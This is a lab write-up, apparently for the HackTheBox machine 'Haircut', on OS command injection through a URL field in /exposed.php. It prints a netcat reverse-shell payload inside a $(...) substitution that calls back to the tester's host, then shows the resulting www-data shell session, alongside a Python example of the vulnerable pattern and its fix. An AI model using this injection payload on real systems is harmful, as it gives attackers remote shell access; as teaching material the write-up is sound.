OS Command Injection


The /exposed.php file most likely passes the supplied URL straight into a curl command to fetch remote content. That is why I am able to see the image in the webroot after entering its URL.

The problem is that the file builds an OS command from user input without proper sanitization; the handful of blacklisted characters and words does not cover every shell construct, so a command substitution still gets through.

$(netcat 10.10.14.5 9998 -e /bin/sh)

The payload is a shell command substitution wrapping a reverse-shell command: the shell evaluates $(...) while assembling the curl command line, so netcat runs and connects back to my listener before curl ever sees the argument.
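To make the failure mode concrete, here is an added example (my own code, not the script from the box) that models the injectable pattern and its fix. printf stands in for curl so it runs offline, and the BLACKLIST tuple is a hypothetical stand-in for the real filter, whose contents the writeup does not reproduce. The point it shows: a token blacklist does not stop $(...), and the real fix is to never hand user input to a shell at all.

```python
import subprocess
from urllib.parse import urlparse

# Hypothetical blacklist standing in for the "few blacklisted characters and
# words" on the target; the actual list is not known from the writeup.
BLACKLIST = (";", "|", "&", "`", "nc ", "bash")


def passes_blacklist(url: str) -> bool:
    """Return True when the input contains none of the banned tokens.
    A $( ... ) substitution contains none of them and slips straight through."""
    return not any(token in url for token in BLACKLIST)


def vulnerable_fetch(url: str) -> str:
    """Model of the injectable pattern: user input concatenated into a shell
    command string. printf replaces curl so this runs offline; /bin/sh expands
    $( ... ) before printf ever runs, so injected commands execute."""
    cmd = "printf '%s' " + url  # no quoting, no escaping, shell=True below
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_url(url: str) -> bool:
    """Allowlist check: only absolute http(s) URLs with a host are accepted."""
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and bool(parsed.netloc)


def hardened_fetch(url: str) -> str:
    """Same fetch with no shell in the loop: the URL is one argv element, so
    nothing interprets $( ... ) even if it survives the allowlist check."""
    if not validate_url(url):
        raise ValueError("not an absolute http(s) URL")
    return subprocess.run(["printf", "%s", url], capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "$(echo injected)"  # constructed stand-in for the netcat payload
    print(passes_blacklist(payload))        # True: the blacklist never sees a banned token
    print(vulnerable_fetch(payload))        # injected: the shell ran the substitution
    print(hardened_fetch("http://example.com/" + payload))  # the literal URL, unexpanded
```

In PHP the equivalent of the argv form is to avoid shell_exec()/system() with interpolated input entirely, or at minimum wrap the argument in escapeshellarg(); the allowlist on scheme and host is defence in depth, not the primary control.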

┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.24] 39572
whoami
www-data
hostname
haircut
ifconfig
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:91:bf  
          inet addr:10.10.10.24  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:91bf/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:91bf/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:993351 errors:0 dropped:72 overruns:0 frame:0
          TX packets:988318 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:187319633 (187.3 MB)  TX bytes:370905042 (370.9 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:160 errors:0 dropped:0 overruns:0 frame:0
          TX packets:160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:11840 (11.8 KB)  TX bytes:11840 (11.8 KB)

Initial foothold established on the target system as the www-data user via OS command injection in /exposed.php.